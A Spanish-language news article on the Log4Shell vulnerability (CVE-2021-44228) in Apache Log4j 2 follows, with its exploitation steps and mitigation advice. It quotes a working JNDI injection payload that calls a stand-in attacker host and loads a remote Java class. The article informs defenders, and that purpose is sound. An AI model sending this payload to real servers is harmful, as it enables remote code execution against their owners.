in

Innumerables servidores son vulnerables a la explotación de día cero de Apache Log4j

027aC4TJ5wRUQJEzWgUsQy2 1.fit lim.size 1200x630.v1639148601

Se ha descubierto una vulnerabilidad crítica en Apache Log4j 2, un paquete Java de código abierto que se utiliza para permitir el registro en muchas aplicaciones populares, y se puede aprovechar para permitir la ejecución remota de código en innumerables servidores.

Apache Software Foundation (ASF) ha identificado la vulnerabilidad como CVE-2021-44228; LunaSec lo ha llamado Log4Shell. (Y el investigador de seguridad Kevin Beaumont tuvo la amabilidad de crear un logo para ello también). ASF dice que Log4Shell recibe la clasificación de gravedad máxima, 10, en la escala del Sistema de puntuación de vulnerabilidad común (CVSS).

LunaSec ofrece un desglose paso a paso de cómo se puede explotar Log4Shell en servidores vulnerables:

  1. Los datos del usuario se envían al servidor (a través de cualquier protocolo),

  2. El servidor registra los datos en la solicitud, que contienen la carga útil maliciosa: ${jndi:ldap://attacker.com/a} (donde attacker.com es un servidor controlado por un atacante),

  3. La vulnerabilidad de Log4j se desencadena por esta carga útil y el servidor realiza una solicitud para attacker.com a través de «Java Naming and Directory Interface» (JNDI),

  4. Esta respuesta contiene una ruta a un archivo de clase Java remoto (ej. http://second-stage.attacker.com/Exploit.class) que se inyecta en el proceso del servidor,

  5. Esta carga útil inyectada desencadena una segunda etapa y permite que un atacante ejecute código arbitrario.

Los investigadores ya han encontrado evidencia de que Log4Shell puede explotarse en servidores operados por Apple, Cloudflare, Twitter, Valve, Tencent y otras grandes empresas. Se dice que la vulnerabilidad también es particularmente fácil de explotar en los servidores de Minecraft, con algunos prueba de concepto ataques usando nada más que el chat del juego.

La versión 2.15.0 de Log4j se ha lanzado para solucionar este defecto, pero The Record informa que su solución simplemente cambia una configuración de «falso» a «verdadero» de forma predeterminada. Los usuarios que vuelven a cambiar la configuración a «falso» siguen siendo vulnerables a los ataques. Afortunadamente, esto significa que los servidores que ejecutan versiones anteriores de Log4j pueden mitigar el ataque cambiando esa configuración.

Recomendado por nuestros editores

ASF dice que «este comportamiento se puede mitigar estableciendo la propiedad del sistema ‘log4j2.formatMsgNoLookups’ en ‘true’ o eliminando la clase JndiLookup del classpath (ejemplo: zip -q -d log4j-core – *. Jar org / apache / logging / log4j / core / lookup / JndiLookup.class) «en versiones anteriores de Log4j si los usuarios no pueden actualizar a la versión 2.15.0.

El Equipo de Respuesta a Emergencias Informáticas (CERT) para Nueva Zelanda, CERT de Deutsche Telekom, el Ruido gris empresa de seguridad, y otros han informado que los atacantes están buscando activamente servidores vulnerables a los ataques de Log4Shell. Estos esfuerzos continuarán y se expandirán, por lo que abordar la vulnerabilidad lo antes posible es fundamental.

¿Te gusta lo que estás leyendo?

Matricularse en Vigilancia de seguridad boletín informativo para recibir nuestras principales historias de privacidad y seguridad directamente en su bandeja de entrada.

Este boletín puede contener publicidad, ofertas o enlaces de afiliados. Suscribirse a un boletín informativo indica su consentimiento a nuestros Términos de uso y Política de privacidad. Puede darse de baja de los boletines informativos en cualquier momento.

fbq('init', '454758778052139'); fbq('track', "PageView"); } }